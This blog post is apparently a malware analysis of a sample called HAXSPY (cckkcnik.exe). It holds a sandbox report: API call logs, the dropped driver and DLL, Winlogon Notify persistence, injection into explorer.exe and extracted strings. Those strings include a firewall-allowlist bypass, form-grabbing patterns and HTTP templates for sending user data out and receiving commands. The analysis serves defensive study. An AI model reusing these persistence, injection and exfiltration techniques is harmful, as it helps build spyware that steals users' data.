HAXSPY Profiling

Publié le par Kareldjag




The scan on VirusTotal:





Creation of objects (service/driver, dll and registry entry) :










Process memory injection in explorer.exe:









Hooks in ntdll:












Network connections:




Some other actions:

-the loaded driver and service:







A summarize of the actions:









The complete report:



Processes:
PID    ParentPID    User    Path   
--------------------------------------------------
3412    2312    POSTE2: Kareldjag   

Ports:
Port    PID    Type    Path   
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description   
--------------------------------------------------
No changes Found           

IE Dlls:
DLL Path    Company Name    File Description   
--------------------------------------------------
No changes Found           

Loaded Drivers:
Driver File    Company Name    Description   
--------------------------------------------------
C:\WINDOWS\system32\mmxtcpip.sys           

Monitored RegKeys
Registry Key    Value   
--------------------------------------------------
Hklm\SYSTEM\CurrentControlSet\Services    mmxtcpip   

Kernel31 Api Log
   
--------------------------------------------------
***** Installing Hooks *****   
719f70df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)   
719f7cc4     RegOpenKeyExA (Protocol_Catalog9)   
719f737e     RegOpenKeyExA (0000001A)   
719f724d     RegOpenKeyExA (Catalog_Entries)   
719f78ea     RegOpenKeyExA (000000000001)   
719f78ea     RegOpenKeyExA (000000000002)   
719f78ea     RegOpenKeyExA (000000000003)   
719f78ea     RegOpenKeyExA (000000000004)   
719f78ea     RegOpenKeyExA (000000000005)   
719f78ea     RegOpenKeyExA (000000000006)   
719f78ea     RegOpenKeyExA (000000000007)   
719f78ea     RegOpenKeyExA (000000000008)   
719f78ea     RegOpenKeyExA (000000000009)   
719f78ea     RegOpenKeyExA (000000000010)   
719f78ea     RegOpenKeyExA (000000000011)   
719f78ea     RegOpenKeyExA (000000000012)   
719f78ea     RegOpenKeyExA (000000000013)   
719f78ea     RegOpenKeyExA (000000000014)   
719f78ea     RegOpenKeyExA (000000000015)   
719f78ea     RegOpenKeyExA (000000000016)   
719f78ea     RegOpenKeyExA (000000000017)   
719f78ea     RegOpenKeyExA (000000000018)   
719f78ea     RegOpenKeyExA (000000000019)   
719f78ea     RegOpenKeyExA (000000000020)   
719f78ea     RegOpenKeyExA (000000000021)   
719f2623     WaitForSingleObject(798,0)   
719f83c6     RegOpenKeyExA (NameSpace_Catalog5)   
719f737e     RegOpenKeyExA (00000005)   
719f7f5b     RegOpenKeyExA (Catalog_Entries)   
719f80ef     RegOpenKeyExA (000000000001)   
719f80ef     RegOpenKeyExA (000000000002)   
719f80ef     RegOpenKeyExA (000000000003)   
719f80ef     RegOpenKeyExA (000000000004)   
719f2623     WaitForSingleObject(790,0)   
719e1afa     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)   
719e1996     GlobalAlloc()   
7c80b511     ExitThread()   
4001c9     LoadLibraryA(USER32.dll)=77d10000   
4001c9     LoadLibraryA(KERNEL32.dll)=7c800000   
58b53164     GetVersionExA()   
58b531cb     GetCommandLineA()   
58b54bba     GetVersionExA()   
58b55760     GetCurrentProcessId()=3412   
58b559ba     GetVersionExA()   
7ca36f9f     GetVersionExA()   
4001c9     LoadLibraryA(SHELL32.dll)=7c9d0000   
4001c9     LoadLibraryA(ADVAPI32.dll)=77da0000   
40128e     CreateFileA(\\.\mmxtcpip)   
77dc97ae     LoadLibraryA(Secur32.dll)=77fc0000   
40151d     RegCreateKeyExA (HKLM\System\CurrentControlSet\Control,(null))   
401680     RegSetValueExA (ver.)   
40151d     RegCreateKeyExA (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk,(null))   
401680     RegSetValueExA (DllName)   
401680     RegSetValueExA (Startup)   
401680     RegSetValueExA (Impersonate)   
401680     RegSetValueExA (Asynchronous)   
401680     RegSetValueExA (MaxWait)   
40154b     GetCommandLineA()   
401595     CreateFileA(C:\Documents and Settings\Administrateur.POSTE2\Mes documents\lastmalwares2\lastmalwares2\lastmalwares\cckkcnik.exe)   
4015b4     _lread(278,263968,4)   
7c839431     ReadFile()   
4015cb     _lread(278,26396c,1d)   
4015de     _lread(278,263989,4)   
4015f1     _lread(278,26398d,4)   
4012d1     CreateFileA(tcpwrk.dll)   
40161d     _lwrite(h=278)   
7c838db2     WriteFile(h=278)   
401631     _lwrite(h=278)   
4012d1     CreateFileA(mmxtcpip.sys)   
40165e     _lwrite(h=278)   
77db5f5e     WaitForSingleObject(278,2bf20)   
77e7fb8e     RegOpenKeyExA (HKLM\Software\Microsoft\Rpc)   
7c81084d     CreateRemoteThread(h=ffffffff, start=1723fd)   
1727fe     CreateFileA(C:\WINDOWS\system32\tcpwrk.dll)   
17281e     _lread(760,2de990,4)   
17282f     _lread(760,2de990,19)   
1728aa     _lread(760,2e85d8,4)   
1728bb     _lread(760,2e85d8,0)   
1728e1     _lread(760,2f2220,4)   
1728f2     _lread(760,2f2220,0)   
17292e     CreateFileA(\\.\mmxtcpip)   
172950     RegOpenKeyExA (HKLM\System\CurrentControlSet\Control)   
4014a0     LoadLibraryA(tcpwrk.dll)=170000   
7c8647cc     GetCurrentProcessId()=3412   
40119f     OpenProcess(pid=1152)   
40121a     WriteProcessMemory(h=750,len=67)   

DirwatchData
   
--------------------------------------------------
WatchDir Initilized OK   
Watching C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp   
Watching C:\WINDOWS   
Watching C:\Program Files   
Modifed: C:\WINDOWS\system32\config\IDT.LOG   
Created: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\7d332b7e07e8f07ceb0f1422be55338d.bmp   
Modifed: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\7d332b7e07e8f07ceb0f1422be55338d.bmp   
Modifed: C:\WINDOWS\system32\config\system.LOG   
Created: C:\WINDOWS\system32\tcpwrk.dll   
Modifed: C:\WINDOWS\system32\tcpwrk.dll   
Modifed: C:\WINDOWS\system32   
Created: C:\WINDOWS\system32\mmxtcpip.sys   
Modifed: C:\WINDOWS\system32\mmxtcpip.sys   
Modifed: C:\Program Files\System Safety Monitor\Log\2006_5_20.POSTE2@Administrateur.ssm.log   
Created: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\be2e8b5952ef3c12cfc5d6082633205e.bmp   
Created: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\~DFB9B9.tmp   
Modifed: C:\Program Files\System Safety Monitor\RenderedLogs\img\icons\be2e8b5952ef3c12cfc5d6082633205e.bmp   
Modifed: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\~DFB9B9.tmp   
Created: C:\DOCUME~1\ADMINI~1.POS\LOCALS~1\Temp\4185XXXX   
File: cckkcnik.exe
Size: 13045 Bytes
MD5: 7A961A17BF7F04D51C266634D0D10E5A


File Properties: CompanyName     
FileDescription 
FileVersion     
InternalName    
LegalCopyright  
OriginalFilename
ProductName     
ProductVersion  

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 96Kb in 0,015 seconds
Urls
--------------------------------------------------


RegKeys
--------------------------------------------------
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
Software\Microsoft\Windows\CurrentVersion

ExeRefs
--------------------------------------------------
File: cckkcnik_dmp.exe_
\0000000.exe
ntoskrnl.exe
mprexe.exe
explorer.exe

Raw Strings:
--------------------------------------------------
File: cckkcnik_dmp.exe_
MD5:  aa4081d537334914846b6ae5572ac906
Size: 98306

Ascii Strings:
---------------------------------------------------------------------------
FSG!
KERNEL32.dll
tcpwrk.dll
t7j@h
tRPj
6e|RHGRytuity54747ESrye9hj
568ue5se64467498ei784467rye9hj
PPTh
XXPj
%t @
%p @
%l @
%h @
%d @
%@ @
%  @
%$ @
%( @
%, @
%0 @
%4 @
%8 @
%< @
%x @
%D @
%H @
%L @
%P @
%T @
%X @
%\ @
%` @
\\.\mmxtcpip
mmxtcpip
LAN TCPX2 service
wsprintfA
USER32.dll
CloseHandle
CreateFileA
CreateRemoteThread
CreateToolhelp32Snapshot
ExitProcess
GetCommandLineA
GetFullPathNameA
GetProcAddress
GetProcessHeap
GetSystemDirectoryA
HeapAlloc
LoadLibraryA
OpenProcess
Process32First
Process32Next
SetCurrentDirectoryA
VirtualAllocEx
WriteProcessMemory
_llseek
_lread
_lwrite
lstrcmpiA
lstrlenA
KERNEL32.dll
ShellExecuteA
SHELL32.dll
CreateServiceA
GetUserNameA
OpenSCManagerA
RegCloseKey
RegCreateKeyExA
RegSetValueExA
StartServiceA
ADVAPI32.dll
!This program cannot be run in DOS mode.
.text
.rdata
@.data
.rsrc
@.reloc
ppaatthh.tmp
tcpwrk.dll
Wj!3
9winit
9WINIt
9Wini
9www.u
PheA
=6666u
9X`h@
Qh_u
QVWSR
Z[_^Y
?<FORt
?<for
?metht
?METH
?postt
?POST
?actit
?ACTIuR
?<TD t
?<td
?/td>t
?/TD>u
?<selu
?<SELu*f
ECu"
?selet
?SELEt
?</FOu
?</fou
?&nbsu
?<td>t
?<TD>u
?</FOu
?</fou
NO@Y
?/FORt
?/foru
?gzipu
text
[--
 --]
6666
WVSh
VWSj
@[_^
\0000000.exe
R%^Y&HFTYIDFSd2stg40yer57
4185
j#htP
j#htP
j#htP
SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\
:*:Enabled:explorer
CMNDt
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
System\CurrentControlSet\Control\MPRServices\TestService
!hNd
~4Ph,
XPh,
6666
/vX6
h6666h
<body bgcolor="#002140" text="#b1dbdd"><font size="3" color="#FF2222">proxy v 1.5 engine </font><font size="5"><br> Error 404</font>
HTTP/1.0 200 OK
6666
f=//t
>wwu
>WWu
</tB<:t
h6666h
t!@t
u$hx
Editt
PhHP
Ph&P
Ph6P
Kernel32
wininet.dll
LoadLibraryA
HttpSendRequestA
CreateThread
\\.\mmxtcpip
mmxtcpip
wsprintfA
CharLowerA
EnumChildWindows
GetClassNameA
GetForegroundWindow
GetWindowTextA
USER32.dll
CloseHandle
ConnectNamedPipe
CreateDirectoryA
CreateFileA
CreateFileMappingA
CreateNamedPipeA
CreateProcessA
CreateThread
DeleteFileA
DeviceIoControl
ExitThread
GetCurrentProcessId
GetCurrentThreadId
GetFileSize
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetProcessHeap
GetSystemDirectoryA
GetTempPathA
GetTickCount
HeapAlloc
HeapFree
IsBadCodePtr
LoadLibraryA
MapViewOfFile
OpenProcess
RtlZeroMemory
Sleep
UnmapViewOfFile
VirtualAlloc
VirtualProtectEx
_llseek
_lread
_lwrite
lstrcatA
lstrcmpiA
lstrcpyA
lstrcpynA
lstrlenA
KERNEL32.dll
CloseServiceHandle
DeleteService
OpenSCManagerA
OpenServiceA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ADVAPI32.dll
HttpOpenRequestA
ernetConnectA
InternetGetConnectedState
InternetOpenA
InternetQueryDataAvailable
InternetReadFile
WININET.dll
WS2_32.dll
URLDownloadToFileA
urlmon.dll
KERNEL32.dll
tcpwrk.dll
tcpwrk
open
\tcpwrk.dll
NtDll.dll
LdrLoadDll
NtCreateProcess
NtCreateProcessEx
NtProtectVirtualMemory
NtWriteVirtualMemory
Z<-S10$21ZcwQ@8Ics0Xvf!3#6^0+DszV7x&
System\CurrentControlSet\Control
ver.
\mxstick.bin
POST /%s?os=nt HTTP/1.1
User-Agent: MSIE 5.0 (xp-sp2-0591)
Host: %s
Content-Length: %u
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
user=%s&info=
\%u.tmp
XXXXXXXX
\\.\pipe\IES4
\\.\pipe\IES4iexplore
\\.\pipe\IES4miranda
\\.\pipe\IES4mozilla
\\.\pipe\IES4thebat
\\.\pipe\IES4msimn
\\.\pipe\IES4msn
\\.\pipe\IES4icq
\\.\pipe\IES4opera
GET /%s?param=cmd&socks=%u&https=%u HTTP/1.0
User-Agent: Windows Updater
Host: %s
Connection: Keep-Alive
&020>0J0V0\0h0t0N4`4m4t4
5#545B5K5\5m5
6$6+6_6f6q6|6
7M7g7v7
8+808@8E8U8Z8j8o8
9'959=9J9\9
9$:3:C:H:M:r:
;(;0;6;K;V;k;w;
< <?<
0"02070D0I0T0n0x0
14191I1N1[1`1w1
2$252C2Q2\2n2z2
2+3>3I3Y3d3y3
444b4
5'5K5o5
6h6v6
7!7.787E7O7\7f7s7}7
8=8N8\8c8v8{8
8%9/969B9R9[9`9e9l9r9}9L:f:k:
;$;3;9;D;W;l;v;
;O<b<v<
="=.===B=^=r=
>">4>f>o>
1$202@3D3J3O3\3
7-7?7K7P7Z7e7n7t7
878A8G8M8S8Y8
9!949G9Z9e9r9
:$:4:J:Q:W:t:z:
;";(;.;4;:;@;F;L;R;X;^;d;j;p;v;|;
<$<*<0<6<
.text
h.rdata
H.data
INIT
.reloc
t$$hN
t$(h
XXXU
SVWhp
u&h,
WININET.DLL
Rj@j
Rj@j
Rj@j
Rj@j
Rj@j
Rj@j
9www.u
tcpwrk.dll
IoCreateDevice
IoCreateSymbolicLink
IofCompleteRequest
KeServiceDescriptorTable
ZwAllocateVirtualMemory
ntoskrnl.exe
D2J2g2
3#3)393@3F3X3`3i3r3}3
4'40464B4H4M4S4_4
5&5.565>5F5N5V5
506d6
7$7-7N7\7n7t7}7
8,878?8M8X8`8n8y8
9%939>9M9X9c9o9
:,:2:9:I:O:i:p:{:
;$;S;i;v;
EntryPoint
tcpwrk
StackSize
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\tcpwrk
Software\Microsoft\Windows\CurrentVersion
System\CurrentControlSet\Control\MPRServices\TestService
System\CurrentControlSet\Control
DllName
Startup
Impersonate
Asynchronous
CommonFilesDir
MaxWait
mmxtcpip.sys
mprexe.exe
open
[%u%u[%s]
ver.
explorer.exe
C:\WINDOWS\system32
C:\WINDOWS\system32\mmxtcpip.sys
[31403998161570199908[Administrateur]
Administrateur
tcpwrk.dql
S%&"
<tRPP0
6e|RHG
yt9ui
ES~r
e9hHtQ
568ueWs>
CDsj
2-AR
)t^=
!P!Th
J'"MqX
;E(%F7h
\V<0H
fH4Q
pQA+x
vbXj
Cp!l
(d,20
C<!x
HdL2P
C\!`
LAN TCPXv2
servic
wspr
intfA
USER%32
wCHo
|R1mo
To'lh
:hN4m'$
mDgiJc
Open9
cpoV
HWHA
uoj>
Vv&S
8QU5
y4g,T
This
proggam
DO~S
mode.
$LDP@EL8
.rdat
j.'N
SPL+<(
rspc
@PV%re
MWj!3
9winFt
t<P~
*<VE86
M*S!
hY@A
8]"p
!7hPB";
@Nt=
yQ=@0
J#.A
9X`h@
Szik
e@tRey
 v[^_
UDafA
u3[S
h&0u
?<FORt
for@
&meBj
METH
:> t
u3GK
post
PO STDz
actiH
ACTIuR
8,">
<TD
3cM*l
!e/2>'
B!RM
L%1o
w5P3
t-o?
\%VWNH
gzipB
5fA^
t? ,
&<#C
[-+ Y.2
]HYh
$"%%
EstF
'$VB
 dD!
R%^Y&H:FT
ID@Sd2stg
40yer57
1v8$
D]+!
r]SQD
R"#-
j|EwB.
\Contr
=ha|=dA
Fi.w
PyNt
\Auth
Lzwp
:*'E
ab=NdX
S1yR
yO%g
CMND
;p"o
DR#^
FTWARE\M
D=d=w
 NTv
h,, Q:Q
DY&A
!ih(
ae%h
~4P(
"c/=
L&BL
Th(?j;
>"WT
/Gd{
uTqKb
fWfY
N/"&
$cmw
42H)
Y6-z&u:
0u$@
$5ND
<body
="#0#214
nt' s
>Pggx
v!1.5
en[g
x0 2
n1<w5
f=q/wt
'>qw%u
qPHW
_WUS
u'N^
mdX>[
iX"$
 7Edi\t+K
B<!}
rdD"g
-d,L!l:
e;8l
X%{nG
0d428
CL!P
Xd\2`
xd|2
$d(2,
C8"<
FUst
k^XP
@$RHd
z2TA
=RHD
Kern1l32
))L<f
AdB"H2G\
Enum
$ildS
')G]
uSn(pQ[
cZVZ
}Iokg
B*n+
 WKS
odulk
&pu,H
ewOf
Unm<8
2adV|
N?IB
CC }
vR)Bf
nDHGAvY
S2_)
VT,Y
/bHJ
fX!\
|NiD
;_K.
S10$2O cwQ@8vI}s
Xvf!3#6^
zV7x&
/%s?
v-0Ag
SIEV5
xp-sn2
91)HH
j=hz
u1W-L
gYh)u
D$a+
/x-w
E^KPu
fX)01
3.S81O+Wb
SEM3U
a*-s
Te4f
N4X`
v$x+z_|f~q~|~
G'g5
v(x0z6|K~V~k~w~
0"$>7
914:9;I<N=[>`?w?
v!x.z8|E~O~\~f~s~}~
%9/'6GBgR
;$<3=9>D?W?l?v?
O<b^:;
v"x4zf|o~
C@3D
9r!t4vGIZ
;4<J=Q>W?t?z?
~.~4~:~@~F~L~R~X~^~d~jIpN?|?
><iIu
+HdH
b5t#
hB\P
?/"#
9_8:
'  D
fCgM
ff$hp
UXY4-
vXd\X
('bK
5Z@e
S!~a
W'V-
Symb
%ZwQ`?
%1nJsk
$6OB
06d'
[~X~`~n~yO
:,;2
xSNi
syPoki
i^,K
wWMm
RDR6A
Z?98_
MaxW
.mXHx
LoadLibraryA
GetProcAddress

Unicode Strings:
---------------------------------------------------------------------------
jjjjj
@jjjj
jjjjjj
SHOW
Security warning
MS Sans Serif
check
\Device\mmxtcpip
\DosDevices\mmxtcpip
Processes:
PID    ParentPID    User    Path   


NB: marked in red, a method to avoid firewall alerts and some information required for the hook of ntdll.



Publié dans METHODOLOGY

Pour être informé des derniers articles, inscrivez vous :

Commenter cet article